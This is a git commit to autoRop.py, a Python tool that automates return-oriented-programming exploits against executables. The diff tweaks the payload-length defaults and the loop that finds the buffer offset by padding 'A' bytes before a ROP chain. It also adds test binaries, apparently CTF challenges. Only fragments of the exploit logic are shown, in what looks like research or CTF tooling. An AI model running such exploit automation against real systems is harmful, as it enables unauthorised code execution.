Include test binaries and fix ascii decoding

2020-12-09 18:12:01 +00:00 · 2020-12-09 18:12:01 +00:00 · 7934330d2e
commit 7934330d2e
parent 2438be66f4
9 changed files with 6 additions and 11 deletions
--- a/autoRop.py
+++ b/autoRop.py
@ -38,7 +38,7 @@ arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an exe
 arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
 arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
 arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
-arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
+arg_parser.add_argument("--min_payload", metavar="min", default=0, type=int, help="The minimum payload length to try")
 arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
 arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
 arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
@ -70,7 +70,6 @@ def run_program(payload: str, **kwargs) -> process:
    
    return p

-
 def find_offset_inc(low: int, high: int):
    default_padding = 64
    print(f"  ├─[🤔] Generating offset discovery payload...")
@ -91,8 +90,10 @@ def find_offset_inc(low: int, high: int):
        for i in range(low, high + 1):
            print(f"  ├─[🤔] Trying offset {i}...")
            rop_payload = (b'A' * i) + original_payload
-            proc = run_program(rop_payload)
-            if b'[ Successful ROP! ]' in proc.readall():
+            proc = run_program(rop_payload, alarm=1)
+            output = proc.readall()
+            print(output)
+            if b'[ Successful ROP! ]' in output:
                print(f"  └─[😳] Found offset at {i}!\n")
                return i

@ -166,4 +167,4 @@ if run:
            term.init()
            proc.interactive()
        else:
-            print(proc.recvall().decode('utf-8'))
+            print(proc.recvall().decode('ascii', errors='ignore'))
--- a/test-binaries/crashmail
+++ b/test-binaries/crashmail
--- a/test-binaries/elf-Linux-x86
+++ b/test-binaries/elf-Linux-x86
--- a/test-binaries/elf-Linux-x86-NDH-chall
+++ b/test-binaries/elf-Linux-x86-NDH-chall
--- a/test-binaries/elf-x86-bash-v4.1.5.1
+++ b/test-binaries/elf-x86-bash-v4.1.5.1
--- a/test-binaries/null-data-addr/Makefile
+++ b/test-binaries/null-data-addr/Makefile
--- a/test-binaries/null-data-addr/null-data-addr
+++ b/test-binaries/null-data-addr/null-data-addr
--- a/test-binaries/null-data-addr/null-data-addr.c
+++ b/test-binaries/null-data-addr/null-data-addr.c
--- a/vuln-programs/.gitignore
+++ b/vuln-programs/.gitignore
@ -1,6 +0,0 @@
-# ignore binaries
-
-*
-!/**/
-!*.*
-!Makefile